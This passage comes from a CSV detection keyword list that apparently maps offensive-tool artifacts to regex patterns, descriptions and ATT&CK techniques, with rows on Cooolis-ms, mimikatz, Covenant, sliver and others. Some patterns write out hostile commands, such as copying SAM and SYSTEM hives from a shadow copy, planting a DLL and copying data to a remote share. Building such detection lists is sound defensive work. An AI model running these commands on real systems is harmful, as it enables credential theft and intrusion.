and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-msX86.zip*",".{0,1000}Cooolis\-msX86\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-Reflective*",".{0,1000}Cooolis\-Reflective.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-Shellcode*",".{0,1000}Cooolis\-Shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-String.*",".{0,1000}Cooolis\-String\..{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CooolisVirtualAlloc*",".{0,1000}CooolisVirtualAlloc.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*copy *.exe \\*\c$\Windows\foxprow.exe*",".{0,1000}copy\s.{0,1000}\.exe\s\\\\.{0,1000}\\c\$\\Windows\\foxprow\.exe.{0,1000}","offensive_tool_keyword","copy","DCOM Lateral Movement technique leveraging Excel and ActivateMicrosoftApp works.","T1021.003 - T1566.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://x.com/ACEResponder/status/1720906842631549377","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*copy *\legit.sys *Windows\System32\Drivers\*.sys*",".{0,1000}copy\s.{0,1000}\\legit\.sys\s.{0,1000}Windows\\System32\\Drivers\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*copy 
*PROCEXP.sys*C:\Windows\System32\WindowsPowershell\*",".{0,1000}copy\s.{0,1000}PROCEXP\.sys.{0,1000}C\:\\Windows\\System32\\WindowsPowershell\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. 
An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*copy Tsutsuji_x64.dll %appdata%*Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll*",".{0,1000}copy\sTsutsuji_x64\.dll\s\%appdata\%.{0,1000}Local\\Microsoft\\WindowsApps\\BluetoothDiagnosticUtil\.dll.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*CopyAndPasteEnum.bat*",".{0,1000}CopyAndPasteEnum\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*CopyAndPasteFileDownloader.bat*",".{0,1000}CopyAndPasteFileDownloader\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Copy-Item -Path * -Destination \\$IP\transfer*",".{0,1000}Copy\-Item\s\-Path\s.{0,1000}\s\-Destination\s\\\\\$IP\\transfer.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 
- T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*",".{0,1000}Copyright\s\(c\)\s2007\s\-\s2021\sgentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Copyright (c) 2023 whoamianony.top*",".{0,1000}Copyright\s\(c\)\s2023\swhoamianony\.top.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*cordyceps.exe*",".{0,1000}cordyceps\.exe.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Cordyceps-main.zip*",".{0,1000}Cordyceps\-main\.zip.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on 
various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*core/handler/reverse*",".{0,1000}core\/handler\/reverse.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*core/http_proxy.go*",".{0,1000}core\/http_proxy\.go.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","False positives expected","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*core/sprayers/lync.py*",".{0,1000}core\/sprayers\/lync\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. 
OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*core/teamserver/stagers/*",".{0,1000}core\/teamserver\/stagers\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*coreImplantFlags binds all flags common to all sliver implant types*",".{0,1000}coreImplantFlags\sbinds\sall\sflags\scommon\sto\sall\ssliver\simplant\stypes.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*CoreSecurity/impacket/*",".{0,1000}CoreSecurity\/impacket\/.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*corrupt data that was marshalled by Ndr64ConformantVaryingArrayMarshall*",".{0,1000}corrupt\sdata\sthat\swas\smarshalled\sby\sNdr64ConformantVaryingArrayMarshall.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*corscanner -i urls.txt -t 100*",".{0,1000}corscanner\s\-i\surls\.txt\s\-t\s100.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Could not parse .dmp file with pypykatz*",".{0,1000}Could\snot\sparse\s\.dmp\sfile\swith\spypykatz.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Could not spoof binary: *",".{0,1000}Could\snot\sspoof\sbinary\:\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An 
interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*Could not write NTLM Hashes to the specified JTR_Dump_Path *",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Could not write NTLM Hashes to the specified JTR_Dump_Path*",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*Couldn't clone GPO {} (maybe it does not exist?*",".{0,1000}Couldn\'t\sclone\sGPO\s\{\}\s\(maybe\sit\sdoes\snot\sexist\?.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Covenant.API*",".{0,1000}Covenant\.API.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.csproj*",".{0,1000}Covenant\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.exe*",".{0,1000}Covenant\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.Models*",".{0,1000}Covenant\.Models.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant.sln*",".{0,1000}Covenant\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant/Covenant*",".{0,1000}Covenant\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Covenant/wwwroot*",".{0,1000}Covenant\/wwwroot.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantAPI.*",".{0,1000}CovenantAPI\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantAPIExtensions.*",".{0,1000}CovenantAPIExtensions\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantBaseMenuItem.*",".{0,1000}CovenantBaseMenuItem\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantService.cs*",".{0,1000}CovenantService\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUser.cs*",".{0,1000}CovenantUser\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUserLogin.*",".{0,1000}CovenantUserLogin\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUserLoginResult.*",".{0,1000}CovenantUserLoginResult\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CovenantUserRegister.*",".{0,1000}CovenantUserRegister\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 